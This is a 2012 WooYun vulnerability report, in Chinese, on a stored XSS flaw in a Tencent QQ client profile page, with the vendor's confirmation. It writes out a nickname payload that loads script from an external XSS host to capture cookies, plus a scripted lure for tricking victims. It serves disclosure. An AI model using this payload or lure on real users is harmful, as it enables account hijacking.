漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-013563
漏洞标题:PKAV腾讯专场 - 3. 腾讯QQ客户端某处功能页面存储型XSS
相关厂商:腾讯
漏洞作者: only_guest
提交时间:2012-10-19 12:10
修复时间:2012-12-03 12:11
公开时间:2012-12-03 12:11
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:13
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-10-19: 细节已通知厂商并且等待厂商处理中
2012-10-19: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向核心白帽子及相关领域专家公开
2012-11-08: 细节向普通白帽子公开
2012-11-18: 细节向实习白帽子公开
2012-12-03: 细节向公众公开
简要描述:
QQ客户端某处页面没过滤好,导致可被利用XSS。漏洞相关信息,会同步至pkav.net。
详细说明:
QQ里很多地方都是嵌入的网页,所以我们对这些嵌入的网页系统的进行了分析。
而后,发现在手机生活这个功能页面中,昵称处未过滤,从而导致XSS。
1. 漏洞页面,个人资料,手机生活页面。
2. QQ用户昵称有一定的长度限制。为了在某种程度上绕过这种限制,我们利用之前在某漏洞中已经使用过的技巧,从webQQ来修改用户的昵称,将昵称修改为:<script src=//xsser.me/xxxxx> 即可。(因为昵称后方有 </script>闭合,因此利用代码无需加</script>)
3. 可以看到当用户打开页面,页面执行了我们指定的JS文件。
页面内的昵称没有被过滤
4. 用自己大号访问小号的个人资料--手机生活页面时。触发XSS,导致信息被记录。
弹个窗
5. 此次发布漏洞时,小号可成功利用登录信息来登录大号。 但是在之前测试时,发现此页面的cookie加了http-only,不知道现在为何又没了?挺奇怪。
6. 不过即使是之前加了http-only的情况,我们依然可以通过跳转到腾讯旗下任意一个反射型XSS,来间接获取到用户的cookies信息。
7. 至于漏洞利用方法。
A. 诱使用户访问你的个人资料-手机生活页面。 至于怎么骗,看各人自己口才了,比如我会说:“hey, 帮我看看我的手机生活页面,为什么我能看到别人的,看不到我自己的啊,你那边能看到吗?我这边显示一片空白。。不知道是不是我网络问题啊。”
B. http://m.qq.com/client/cguest?frienduin=10001 这个页面本身没有做好有判定,因此任何人都可以访问到任何人的手机生活页面。比如上面是pony的手机生活页面。因而,http://m.qq.com/client/cguest?frienduin=带有XSS的QQ号码, 这个页面将可以直接用来作为XSS页面发送给受害者。
漏洞证明:
见详细说明
修复方案:
昵称输出过滤
版权声明:转载请注明来源 only_guest@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2012-10-19 16:00
厂商回复:
非常感谢您的报告。我们会马上安排专人跟进确认处理,有新的情况会及时同步
最新状态:
暂无